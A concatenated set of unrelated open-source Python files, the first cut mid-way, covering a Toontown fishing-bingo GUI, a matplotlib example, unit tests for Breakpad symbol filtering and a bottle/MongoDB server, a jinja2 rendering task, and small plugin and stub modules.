self.timer.reparentTo(self) self.timer.setScale(0.17) self.timer.setPos(0.24, 0, -0.18) def resetGameTimer(self): self.timer.reset() def startGameCountdown(self, time): self.notify.debug('startGameCountdown: %s' % time) self.timer.countdown(time) def startNextGameCountdown(self, time): self.nextGameTimer.countdown(time) def hideNextGameTimer(self): self.nextGame['text'] = '' self.nextGame.hide() def showNextGameTimer(self, text): self.nextGame['text'] = text self.nextGame.show() def resetNextGameTimer(self): self.nextGameTimer.reset() def stopNextGameTimer(self): self.nextGameTimer.stop() def setNextGameText(self, text): self.nextGame['text'] = text def setJackpotText(self, text): if text: str = TTLocalizer.FishBingoJackpotWin % text else: str = '' self.jpText['text'] = str def resetGameTypeText(self): self.gameType['text'] = '' self.gameType.setFrameSize() self.gameType.hide() def loadNextGameTimer(self): self.nextGame = DirectLabel(parent=self, relief=None, text='', text_font=ToontownGlobals.getSignFont(), text_scale=TTLocalizer.BCGnextGame * BG.CardImageScale[2], text_fg=(1.0, 1.0, 1.0, 1), pos=(BG.GridXOffset, 0, 4 * BG.CardImageScale[2])) self.nextGameTimer = ToontownTimer.ToontownTimer() self.nextGameTimer.reparentTo(self.nextGame) self.nextGameTimer.setPos(0, 0, -5 * BG.CardImageScale[2]) self.nextGameTimer.setProp('image', None) self.nextGameTimer.setProp('text_font', ToontownGlobals.getSignFont()) self.nextGameTimer.setProp('text_scale', 0.2 * BG.CardImageScale[2]) self.nextGameTimer.setFontColor(Vec4(1.0, 1.0, 1.0, 1)) return def setGameOver(self, text): self.gameOver['text'] = text def load(self): self.notify.debug('Bingo card loading') self.loadGameTimer() self.loadNextGameTimer() textScale = 0.06 textHeight = 0.38 * BG.CardImageScale[2] guiButton = loader.loadModel('phase_3/models/gui/quit_button') self.bingo = DirectButton(parent=self, pos=(BG.GridXOffset, 0, 
0.305), scale=(0.0343, 0.035, 0.035), relief=None, state=DGG.DISABLED, geom=self.model.find('**/BINGObutton'), geom_pos=(0, 0, 0), geom_hpr=(0, 90, 0), image=(self.model.find('**/Gold_TTButtUP'), self.model.find('**/goldTTButtDown'), self.model.find('**/RolloverBingoButton1')), image_pos=(0, 0, 0), image_hpr=(0, 90, 0), image_color=BG.getButtonColor(0), pressEffect=False) guiButton.removeNode() arrowModel = loader.loadModel('phase_3.5/models/gui/speedChatGui') self.gameType = DirectButton(parent=self, pos=(BG.GridXOffset, 0, -8 * BG.CardImageScale[2] - 0.01), relief=None, image=arrowModel.find('**/chatArrow'), image_scale=-0.05, image_pos=(-0.2, 0, 0.025), text='', text_scale=0.045, text_fg=(1, 1, 1, 1), text_font=ToontownGlobals.getSignFont(), text_wordwrap=10.5, text_pos=(0.01, 0.008), pressEffect=False) arrowModel.removeNode() self.gameType.bind(DGG.ENTER, self.onMouseEnter) self.gameType.bind(DGG.EXIT, self.onMouseLeave) self.gameType.hide() self.jpText = DirectLabel(parent=self, pos=(BG.GridXOffset, 0, 0.22), relief=None, state=DGG.NORMAL, text='', text_scale=TTLocalizer.BCGjpText, text_pos=(0, 0, 0), text_fg=(1, 1, 1, 1), text_shadow=(0, 0, 0, 1), text_font=ToontownGlobals.getInterfaceFont(), text_wordwrap=TTLocalizer.BCGjpTextWordwrap) self.gameOver = DirectLabel(parent=self, pos=(BG.GridXOffset, 0, 0), relief=None, state=DGG.NORMAL, text='', text_scale=textScale, text_fg=(1, 1, 1, 1), text_font=ToontownGlobals.getSignFont()) self.jpSign = DirectFrame(parent=self.parent, relief=None, state=DGG.NORMAL, pos=BG.CardPosition, scale=(0.035, 0.035, 0.035), text=TTLocalizer.FishBingoJackpot, text_scale=2, text_pos=(-1.5, 18.6), text_fg=(1, 1, 1, 1), image=self.model.find('**/jackpot'), image_pos=(0, 0, 0), image_hpr=(0, 90, 0), sortOrder=DGG.BACKGROUND_SORT_INDEX) self.makeJackpotLights(self.jpSign) self.hideJackpot() self.makeTutorial() return def destroy(self): self.cleanTutorial() self.removeGame() del self.cellGuiList self.gameOver.destroy() self.destroyJackpotLights() self.jpSign.destroy() self.nextGameTimer.destroy() self.nextGame.destroy() self.timer.destroy() self.bingo.destroy() self.gameType.destroy() DirectFrame.destroy(self) self.notify.debug('Bingo card destroyed') def loadCard(self): cardSize = self.game.getCardSize() for index in xrange(cardSize): self.cellGuiList[index].generateLogo() if index == cardSize / 2: self.cellGuiList[index].generateMarkedLogo() elif self.game.getGameState() & 1 << index: self.cellGuiList[index].disable() def disableCard(self): self.stopCellBlinking() for index in xrange(self.game.getCardSize()): self.cellGuiList[index].disable() def enableCard(self, callback = None): self.notify.info('enable Bingo card') self.stopCellBlinking() for index in xrange(len(self.cellGuiList)): if index != self.game.getCardSize() / 2: self.cellGuiList[index].enable(callback) def generateCard(self, tileSeed, zoneId): rng = RandomNumGen.RandomNumGen(tileSeed) rowSize = self.game.getRowSize() fishList = FishGlobals.getPondGeneraList(zoneId) for i in xrange(len(fishList)): fishTuple = fishList.pop(0) weight = FishGlobals.getRandomWeight(fishTuple[0], fishTuple[1]) fish = FishBase.FishBase(fishTuple[0], fishTuple[1], weight) fishList.append(fish) emptyCells = self.game.getCardSize() - 1 - len(fishList) rodId = 0 for i in xrange(emptyCells): fishVitals = FishGlobals.getRandomFishVitals(zoneId, rodId, rng) while not fishVitals[0]: fishVitals = FishGlobals.getRandomFishVitals(zoneId, rodId, rng) fish = FishBase.FishBase(fishVitals[1], fishVitals[2], fishVitals[3]) 
fishList.append(fish) rodId += 1 if rodId > 4: rodId = 0 for i in xrange(rowSize): for j in xrange(self.game.getColSize()): color = self.getCellColor(i * rowSize + j) if i * rowSize + j == self.game.getCardSize() / 2: tmpFish = 'Free' else: choice = rng.randrange(0, len(fishList)) tmpFish = fishList.pop(choice) xPos = BG.CellImageScale * (j - 2) + BG.GridXOffset yPos = BG.CellImageScale * (i - 2) - 0.015 cellGui = BingoCardCell.BingoCardCell(i * rowSize + j, tmpFish, self.model, color, self, image_scale=BG.CellImageScale, pos=(xPos, 0, yPos)) self.cellGuiList.append(cellGui) def cellUpdateCheck(self, id, genus, species): fishTuple = (genus, species) if self.cellGuiList[id].getFishGenus() == genus or fishTuple == FishGlobals.BingoBoot: self.notify.debug('Square found! Cell disabled: %s' % id) self.stopCellBlinking() self.cellGuiList[id].disable() self.game.setGameState(self.game.getGameState() | 1 << id) if self.game.checkForBingo(): return BG.WIN return BG.UPDATE return BG.NO_UPDATE def cellUpdate(self, cellId): self.cellGuiList[cellId].disable() def addGame(self, game): self.game = game type = game.getGameType() self.gameType.setProp('text', BG.getGameName(type)) self.gameType.setFrameSize() self.gameType.show() def getGame(self): return self.game def removeGame(self): self.stopCellBlinking() if self.game: self.game.destroy() self.game = None self.setJackpotText(None) self.resetGameTypeText() for cell in self.cellGuiList: cell.destroy() self.cellGuiList = [] return def getUnmarkedMatches(self, fish): if self.game is None: return [] matches = [] for cell in self.cellGuiList: if cell['state'] == DGG.NORMAL: if cell.getFishGenus() == fish[0] or fish == FishGlobals.BingoBoot: matches.append(cell) return matches def getCellColor(self, id): if self.game.checkForColor(id): return BG.CellColorActive return BG.CellColorInactive def resetCellColors(self): for cell in self.cellGuiList: c = self.getCellColor(cell.cellId) cell['image'].setColor(c[0], c[1], c[2], c[3]) cell.setImage() def stopCellBlinking(self): self.hideTutorial() self.resetCellColors() taskMgr.remove(self.taskNameFlashFish) def __indicateMatches(self, bFlipFlop, fish): unmarkedMatches = self.getUnmarkedMatches(fish) if len(unmarkedMatches) is 0: return Task.done if bFlipFlop: for cell in unmarkedMatches: cell['image'].setColor(1, 0, 0, 1) cell.setImage() else: self.resetCellColors() taskMgr.doMethodLater(0.5, self.__indicateMatches, self.taskNameFlashFish, extraArgs=(not bFlipFlop, fish)) return Task.done def fishCaught(self, fish): self.stopCellBlinking() self.__indicateMatches(True, fish) def setBingo(self, state = DGG.DISABLED, callback = None): self.notify.debug('setBingo: %s %s' % (state, callback)) if self.bingo['state'] == state: return if not self.game: return if state == DGG.NORMAL: self.__indicateBingo(True) if self.game.getGameType() == BG.BLOCKOUT_CARD: self.showJackpot() else: taskMgr.remove('bingoFlash') c = BG.getButtonColor(self.game.getGameType()) self.bingo['image_color'] = Vec4(c[0], c[1], c[2], c[3]) self.hideJackpot() self.bingo['state'] = state self.bingo['command'] = callback def checkForBingo(self): return self.game.checkForBingo() def __indicateBingo(self, bFlipFlop): if not self.game: return Task.done if bFlipFlop: gameType = self.game.getGameType() if gameType == BG.DIAGONAL_CARD: color = Vec4(1, 1, 1, 1) else: color = Vec4(1, 0, 0, 1) self.bingo['image_color'] = color else: c = BG.getButtonColor(self.game.getGameType()) self.bingo['image_color'] = Vec4(c[0], c[1], c[2], c[3]) taskMgr.doMethodLater(0.5, 
self.__indicateBingo, 'bingoFlash', extraArgs=(not bFlipFlop,)) return Task.done NumLights = 32 Off = False On = True def showJackpot(self): self.jpSign.show() for light in self.jpLights: light.show() self.flashJackpotLights(random.randrange(3)) def hideJackpot(self): self.jpSign.hide() for light in self.jpLights: light.hide() taskMgr.remove('jackpotLightFlash') def getLightName(self, lightIndex, bOn): lightIndex += 1 if bOn == self.On: return '**/LightOn_0%02d' % lightIndex else: return '**/LightOff_0%02d' % lightIndex def makeJackpotLights(self, parent): self.jpLights = [] for nLight in range(self.NumLights): lightName = self.getLightName(nLight, self.Off) light = DirectFrame(parent=parent, relief=None, image=self.model.find(lightName), image_hpr=(0, 90, 0)) self.jpLights.append(light) return def destroyJackpotLights(self): taskMgr.remove('jackpotLightFlash') for light in self.jpLights: light.destroy() def lightSwitch(self, bOn, lightIndex = -1): if lightIndex == -1: for nLight in range(self.NumLights): self.lightSwitch(bOn, nLight) else: lightIndex %= self.NumLights light = self.jpLights[lightIndex - 1] light['image'] = self.model.find(self.getLightName(lightIndex, bOn)) light['image_hpr'] = (0, 90, 0) def flashJackpotLights(self, flashMode, nTimeIndex = 0): if flashMode == 2: self.lightSwitch(self.Off) self.lightSwitch(self.On, nTimeIndex) self.lightSwitch(self.On, self.NumLights - nTimeIndex) self.lightSwitch(self.On, self.NumLights / 2 + nTimeIndex) self.lightSwitch(self.On, self.NumLights / 2 - nTimeIndex) nTimeIndex = (nTimeIndex + 1) % (self.NumLights / 2) delay = 0.05 elif flashMode == 1: if nTimeIndex: self.lightSwitch(self.On) else: self.lightSwitch(self.Off) nTimeIndex = not nTimeIndex delay = 0.5 elif flashMode == 0: for nLight in range(self.NumLights): if nLight % 2 == nTimeIndex: self.lightSwitch(self.On, nLight) else: self.lightSwitch(self.Off, nLight) nTimeIndex = (nTimeIndex + 1) % 2 delay = 0.2 taskMgr.doMethodLater(delay, self.flashJackpotLights, 'jackpotLightFlash', extraArgs=(flashMode, nTimeIndex)) return Task.done def makeTutorial(self): self.tutorial = TTDialog.TTDialog(fadeScreen=0, pad=(0.05, 0.05), midPad=0, topPad=0, sidePad=0, text=TTLocalizer.FishBingoHelpBlockout, style=TTDialog.NoButtons, pos=BG.TutorialPosition, scale=BG.TutorialScale) self.tutorial.hide() def cleanTutorial(self): self.tutorial.cleanup() self.tutorial = None return def showTutorial(self, messageType): if messageType == BG.TutorialIntro: self.tutorial['text'] = TTLocalizer.FishBingoHelpMain elif messageType == BG.TutorialMark: self.tutorial['text'] = TTLocalizer.FishBingoHelpFlash elif messageType == BG.TutorialCard: if self.game: gameType = self.game.getGameType() self.tutorial['text'] = BG.getHelpString(gameType) elif messageType == BG.TutorialBingo: self.tutorial['text'] = TTLocalizer.FishBingoHelpBingo self.tutorial.show() def hideTutorial(self, event = None): if self.tutorial: self.tutorial.hide() def onMouseEnter(self, event): if self.gameType['text'] is not '': self.showTutorial(BG.TutorialCard) def onMouseLeave(self, event): self.hideTutorial() def castingStarted(self): if taskMgr.hasTaskNamed(self.taskNameFlashFish): if not base.localAvatar.bFishBingoMarkTutorialDone: self.showTutorial(BG.TutorialMark) base.localAvatar.b_setFishBingoMarkTutorialDone(True)
ksmit799/Toontown-Source
toontown/fishing/BingoCardGui.py
Python
mit
17,376
'''
Illustration of upper and lower limit symbols on errorbars
'''
from math import pi
from numpy import array, arange, sin
import pylab as P

fig = P.figure()
x = arange(10.0)
y = sin(arange(10.0)/20.0*pi)
P.errorbar(x, y, yerr=0.1, capsize=3)

y = sin(arange(10.0)/20.0*pi) + 1
P.errorbar(x, y, yerr=0.1, uplims=True)

y = sin(arange(10.0)/20.0*pi) + 2
upperlimits = array([1, 0]*5)
lowerlimits = array([0, 1]*5)
P.errorbar(x, y, yerr=0.1, uplims=upperlimits, lolims=lowerlimits)
P.xlim(-1, 10)

fig = P.figure()
x = arange(10.0)/10.0
y = (x+0.1)**2
P.errorbar(x, y, xerr=0.1, xlolims=True)

y = (x+0.1)**3
P.errorbar(x+0.6, y, xerr=0.1, xuplims=upperlimits, xlolims=lowerlimits)

y = (x+0.1)**4
P.errorbar(x+1.2, y, xerr=0.1, xuplims=True)
P.xlim(-0.2, 2.4)
P.ylim(-0.1, 1.3)

P.show()
sniemi/SamPy
sandbox/src1/examples/errorbar_limits.py
Python
bsd-2-clause
784
#!/usr/bin/env python # Copyright (c) 2012 Google Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """Unit tests for filter_syms.py""" import cStringIO import ntpath import os import StringIO import sys import unittest ROOT_DIR = os.path.dirname(os.path.abspath(__file__)) sys.path.insert(0, os.path.join(ROOT_DIR, '..')) # In root import filter_syms class FilterSysmsTest(unittest.TestCase): def assertParsed(self, input_data, ignored_prefixes, expected): input_io = cStringIO.StringIO(input_data) output_io = cStringIO.StringIO() parser = filter_syms.SymbolFileParser(input_io, output_io, ignored_prefixes, ntpath) parser.Process() self.assertEqual(output_io.getvalue(), expected) def testDuplicateFiles(self): """Tests that duplicate files in FILE records are correctly removed and that Line records are updated.""" INPUT = \ """MODULE windows x86 111111111111111111111111111111111 module1.pdb INFO CODE_ID FFFFFFFF module1.exe FILE 1 foo/../file1_1.cc FILE 2 bar/../file1_1.cc FILE 3 baz/../file1_1.cc FUNC 1000 c 0 Function1_1 1000 8 45 2 1008 4 46 3 100c 4 44 1 """ EXPECTED_OUTPUT = \ """MODULE windows x86 111111111111111111111111111111111 module1.pdb INFO CODE_ID FFFFFFFF module1.exe FILE 1 file1_1.cc FUNC 1000 c 0 Function1_1 1000 8 45 1 1008 4 46 1 100c 4 44 1 """ self.assertParsed(INPUT, [], EXPECTED_OUTPUT) def testIgnoredPrefix(self): """Tests that prefixes in FILE records are correctly removed.""" INPUT = \ """MODULE windows x86 111111111111111111111111111111111 module1.pdb INFO CODE_ID FFFFFFFF module1.exe FILE 1 /src/build/foo/../file1_1.cc FILE 2 /src/build/bar/../file1_2.cc FILE 3 /src/build/baz/../file1_2.cc FUNC 1000 c 0 Function1_1 1000 8 45 2 1008 4 46 3 100c 4 44 1 """ EXPECTED_OUTPUT = \ """MODULE windows x86 111111111111111111111111111111111 module1.pdb INFO CODE_ID FFFFFFFF module1.exe FILE 1 file1_1.cc FILE 2 file1_2.cc FUNC 1000 c 0 Function1_1 1000 8 45 2 1008 4 46 2 100c 4 44 1 """ IGNORED_PREFIXES = ['\\src\\build\\'] self.assertParsed(INPUT, IGNORED_PREFIXES, EXPECTED_OUTPUT) def testIgnoredPrefixesDuplicateFiles(self): """Tests that de-duplication of FILE 
records happens BEFORE prefixes are removed.""" INPUT = \ """MODULE windows x86 111111111111111111111111111111111 module1.pdb INFO CODE_ID FFFFFFFF module1.exe FILE 1 /src/build/foo/../file1_1.cc FILE 2 /src/build/bar/../file1_2.cc FILE 3 D:/src/build2/baz/../file1_2.cc FUNC 1000 c 0 Function1_1 1000 8 45 2 1008 4 46 3 100c 4 44 1 """ EXPECTED_OUTPUT = \ """MODULE windows x86 111111111111111111111111111111111 module1.pdb INFO CODE_ID FFFFFFFF module1.exe FILE 1 file1_1.cc FILE 2 file1_2.cc FILE 3 file1_2.cc FUNC 1000 c 0 Function1_1 1000 8 45 2 1008 4 46 3 100c 4 44 1 """ IGNORED_PREFIXES = ['\\src\\build\\', 'D:\\src\\build2\\'] self.assertParsed(INPUT, IGNORED_PREFIXES, EXPECTED_OUTPUT) if __name__ == '__main__': unittest.main()
multitheftauto/mtasa-blue
vendor/google-breakpad/src/tools/python/tests/filter_syms_unittest.py
Python
gpl-3.0
4,454
############################################################################### ## ## Copyright (C) 2014-2016, New York University. ## Copyright (C) 2011-2014, NYU-Poly. ## Copyright (C) 2006-2011, University of Utah. ## All rights reserved. ## Contact: [email protected] ## ## This file is part of VisTrails. ## ## "Redistribution and use in source and binary forms, with or without ## modification, are permitted provided that the following conditions are met: ## ## - Redistributions of source code must retain the above copyright notice, ## this list of conditions and the following disclaimer. ## - Redistributions in binary form must reproduce the above copyright ## notice, this list of conditions and the following disclaimer in the ## documentation and/or other materials provided with the distribution. ## - Neither the name of the New York University nor the names of its ## contributors may be used to endorse or promote products derived from ## this software without specific prior written permission. ## ## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" ## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, ## THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR ## PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR ## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, ## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, ## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; ## OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, ## WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR ## OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE." ## ############################################################################### from __future__ import division version = '1.0.5'
minesense/VisTrails
vistrails/db/versions/v1_0_5/translate/__init__.py
Python
bsd-3-clause
1,965
# Copyright 2017 datawire. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import absolute_import from .sops import decrypt, decrypt_cleanup from .tasks import task, TaskError from jinja2 import Environment, FileSystemLoader, Template, TemplateError, TemplateNotFound, Undefined, UndefinedError import os, shutil class WarnUndefined(Undefined): def warn(self): try: self._fail_with_undefined_error() except UndefinedError, e: msg = str(e) task.echo(task.terminal().bold_red("warning: %s (this will become an error soon)" % msg)) def __iter__(self): self.warn() return Undefined.__iter__(self) def __str__(self): self.warn() return Undefined.__str__(self) def __unicode__(self): self.warn() return Undefined.__unicode__(self) def __len__(self): self.warn() return Undefined.__len__(self) def __nonzero__(self): self.warn() return Undefined.__nonzero__(self) def __eq__(self, other): self.warn() return Undefined.__eq__(self, other) def __ne__(self, other): self.warn() return Undefined.__ne__(self, other) def __bool__(self): self.warn() return Undefined.__bool__(self) def __hash__(self): self.warn() return Undefined.__hash__(self) def _do_render(env, root, name, variables): try: return env.get_template(name).render(**variables) except TemplateNotFound, e: raise TaskError("%s/%s: %s" % (root, name, "template not found")) except TemplateError, e: raise TaskError("%s/%s: %s" % (root, name, e)) @task() def render(source, target, predicate, **variables): """Renders a file or directory as a jinja template using the supplied variables. The source is a path pointing to either an individual file or a directory. The target is a path pointing to the desired location of the output. If the source points to a file, then the target is created/overwritten as a file. If the source points to a directory, the target is created as a directory. If the target already exists, it is removed and recreated prior to rendering the template. """ root = source if os.path.isdir(source) else os.path.dirname(source) env = Environment(loader=FileSystemLoader(root), undefined=WarnUndefined) if os.path.isdir(source): if os.path.exists(target): shutil.rmtree(target) os.makedirs(target) for path, dirs, files in os.walk(source): for name in files: if not predicate(name): continue if name.endswith("-enc.yaml"): decrypt(path, name) relpath = os.path.join(os.path.relpath(path, start=source), name) rendered = _do_render(env, root, relpath, variables) outfile = os.path.join(target, relpath) outdir = os.path.dirname(outfile) if not os.path.exists(outdir): os.makedirs(outdir) with open(outfile, "write") as f: f.write(rendered) if name.endswith("-enc.yaml"): decrypt_cleanup(path, name) else: if source.endswith("-enc.yaml"): decrypt(path, source) rendered = _do_render(env, root, os.path.basename(source), variables) with open(target, "write") as f: f.write(rendered) if source.endswith("-enc.yaml"): decrypt_cleanup(path, source) @task() def renders(name, source, **variables): """ Renders a string as a jinja template. 
The name is used where filename would normally appear in error messages. """ try: return Template(source, undefined=WarnUndefined).render(**variables) except TemplateError, e: raise TaskError("%s: %s" % (name, e))
sipplified/forge
forge/jinja2.py
Python
apache-2.0
4,507
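A small sketch of the renders() helper above. The import path is inferred from forge/jinja2.py, and it is an assumption that a @task-decorated function can be called this directly outside forge's task machinery:

    # Sketch only: direct invocation of the @task-wrapped function is assumed.
    from forge.jinja2 import renders

    # Renders a template string; undefined names only warn (via WarnUndefined)
    # rather than raising, per the module above.
    print(renders('example', 'Hello {{ who }}!', who='world'))  # Hello world!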
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Copyright (C) 2014 David Vavra ([email protected])

This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
"""

from yapsy.IPlugin import IPlugin


class DNS(IPlugin):
    def __init__(self):
        self.hosts = {}

    def addHost(self, id, host):
        self.hosts[id] = host

    def parseContext(self, context, *args):
        for dns in context.iter('dns_host'):
            for dnsServer in dns.iter('dns_host'):
                self.addHost(dnsServer.attrib['id'], dnsServer.text)
david-vavra/pyrage
pyrage/modules/dns.py
Python
gpl-2.0
1,216
import logging import multiprocessing import os import pprint import random import socket import string import subprocess import sys import threading import unittest try: import queue except ImportError: import Queue as queue import mongobox import requests import hello LOG = logging.getLogger(__name__) def get_free_port(host): sock = socket.socket() sock.bind((host, 0)) port = sock.getsockname()[1] sock.close() del sock return port def _queued_output(out): """Use a separate process to read server stdout into a queue. Returns the queue object. Use get() or get_nowait() to read from it. """ def _enqueue_output(_out, _queue): for line in _out: _queue.put(line) output_queue = multiprocessing.Queue() # I tried a Thread, it was blocking the main thread because # of GIL I guess. This made me very confused. process = multiprocessing.Process( target=_enqueue_output, args=(out, output_queue)) process.daemon = True process.start() return output_queue class TestServerFunctional(unittest.TestCase): @classmethod def setUpClass(cls): cls.host = '127.0.0.1' cls.port = get_free_port(cls.host) cls.url = 'http://%s:%s' % (cls.host, cls.port) cls.test_env = ''.join(random.sample(string.hexdigits, 22)) # Using hello.__path__ instead of just `hello-bottle` # to ensure we don't get a rogue binary. # Use sys.executable to ensure we run the server using # the exact same python interpreter as this test is using. cls._mbox = mongobox.MongoBox() cls._mbox.start() cls.mongoclient = cls._mbox.client() # pymongo client assert cls._mbox.running() exe = os.path.realpath(hello.__file__) assert os.path.isfile(exe) argv = [ sys.executable, exe, '--host', cls.host, '--port', str(cls.port), '--verbose', '--debug', '--server', 'gevent', '--mongo-port', str(cls._mbox.port), ] server_started = "Listening on {url}/".format(url=cls.url) # ensure a hard-coded os.environ when testing! # Without the unbuffered flag this doesn't # work in > Python 3. _env = { 'PYTHONDONTWRITEBYTECODE': '1', 'PYTHONUNBUFFERED': '1', } # bufsize=1 means line buffered. # universal_newlines=True makes stdout text and not bytes cls.server = subprocess.Popen( argv, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=True, bufsize=1, env=_env, ) cls._timeout = 5 startup_timeout = threading.Timer(cls._timeout, cls.server.kill) startup_timeout.daemon = True startup_timeout.start() cls.non_blocking_read_queue = _queued_output(cls.server.stdout) # cls.server.poll() will return -9 if Timer kill() sends SIGKILL while cls.server.poll() is None: try: line = cls.non_blocking_read_queue.get_nowait() except queue.Empty: continue else: LOG.debug("Test hello-bottle server STDOUT: %s", line) if server_started in line: startup_timeout.cancel() LOG.info("hello-bottle server started successfully!") break def setUp(self): """Ensure that the server started.""" code = self.server.poll() # if code is None: server running. # if code is 0, server exited for some reason. if code: if code == -9: self.fail("Failed to start hello-bottle server within " "the %s second timeout!" % self._timeout) else: self.fail("Failed to start test hello-bottle process! 
" "Exit code: %s" % code) if code == 0: self.fail("Server died for some reason with a 0 exit code.") self.session = requests.session() # Set up retries to not fail during server startup delay retry = requests.packages.urllib3.util.Retry( total=5, backoff_factor=0.2) adapter = requests.adapters.HTTPAdapter(max_retries=retry) self.session.mount(self.url, adapter) @classmethod def tearDownClass(cls): cls._mbox.stop() assert not cls._mbox.running() while not cls.non_blocking_read_queue.empty(): line = cls.non_blocking_read_queue.get_nowait() LOG.debug("POST-MORTEM test hello-bottle server STDOUT: %s", line) try: cls.server.kill() except OSError: pass def _check_response(self, response): """Check for 500s and debug-tracebacks.""" if response.status_code == 500: req = response.request try: body = response.json() if 'traceback' in body: msg = ('Traceback from test hello-bottle server ' 'when calling {m} {p}\n{tb}') self.fail( msg.format(m=req.method, p=req.path_url, tb=body['traceback']) # fail ) else: self.fail(pprint.pformat(body, indent=2)) except (TypeError, ValueError): pass def test_version(self): vers = self.session.get('{}/version'.format(self.url)) self._check_response(vers) vers = vers.json() expected = { 'version': hello.__version__ } self.assertEqual(expected, vers) def test_not_found(self): response = self.session.get('{}/i/dont/exist'.format(self.url)) self._check_response(response) self.assertEqual(404, response.status_code) def test_post_and_get_document(self): data = {'junk': ''.join(random.sample(string.hexdigits, 22))} create = self.session.post( '{}/docs'.format(self.url), json=data) object_id = create.json()['id'] response = self.session.get( '{}/docs/{}'.format(self.url, object_id)) expected = data.copy() expected['_id'] = object_id self.assertEqual(response.json(), expected) if __name__ == '__main__': opts = {} if any(v in ' '.join(sys.argv) for v in ['--verbose', '-v']): logging.basicConfig(level=logging.DEBUG, stream=sys.stdout) opts['verbosity'] = 2 unittest.main(**opts)
samstav/hello-bottle
test_hello.py
Python
apache-2.0
6,762
# DO NOT EDIT THIS FILE! # # Python module CosPersistencePID generated by omniidl import omniORB omniORB.updateModule("CosPersistencePID") # ** 1. Stub files contributing to this module import CosPersistencePID_idl # ** 2. Sub-modules # ** 3. End
amonmoce/corba_examples
omniORBpy-4.2.1/build/python/COS/CosPersistencePID/__init__.py
Python
mit
251
# -*- coding: utf-8 -*- """Tests of dataset utility functions.""" #------------------------------------------------------------------------------ # Imports #------------------------------------------------------------------------------ import os.path as op from itertools import product import numpy as np from numpy.testing import assert_array_equal as ae import responses from pytest import raises, yield_fixture from ..datasets import (download_file, download_test_data, download_sample_data, _check_md5_of_url, _BASE_URL, ) from ..logging import register, StringLogger, set_level #------------------------------------------------------------------------------ # Fixtures #------------------------------------------------------------------------------ def setup(): set_level('debug') # Test URL and data _URL = 'http://test/data' _DATA = np.linspace(0., 1., 100000).astype(np.float32) _CHECKSUM = '7d257d0ae7e3af8ca3574ccc3a4bf072' def _add_mock_response(url, body, file_type='binary'): content_type = ('application/octet-stream' if file_type == 'binary' else 'text/plain') responses.add(responses.GET, url, body=body, status=200, content_type=content_type, ) @yield_fixture def mock_url(): _add_mock_response(_URL, _DATA.tostring()) _add_mock_response(_URL + '.md5', _CHECKSUM + ' ' + op.basename(_URL)) yield responses.reset() @yield_fixture(params=product((True, False), repeat=4)) def mock_urls(request): data = _DATA.tostring() checksum = _CHECKSUM url_data = _URL url_checksum = _URL + '.md5' if not request.param[0]: # Data URL is corrupted. url_data = url_data[:-1] if not request.param[1]: # Data is corrupted. data = data[:-1] if not request.param[2]: # Checksum URL is corrupted. url_checksum = url_checksum[:-1] if not request.param[3]: # Checksum is corrupted. checksum = checksum[:-1] _add_mock_response(url_data, data) _add_mock_response(url_checksum, checksum) yield request.param, url_data, url_checksum responses.reset() def _dl(path): download_file(_URL, path) with open(path, 'rb') as f: data = f.read() return data def _check(data): ae(np.fromstring(data, np.float32), _DATA) 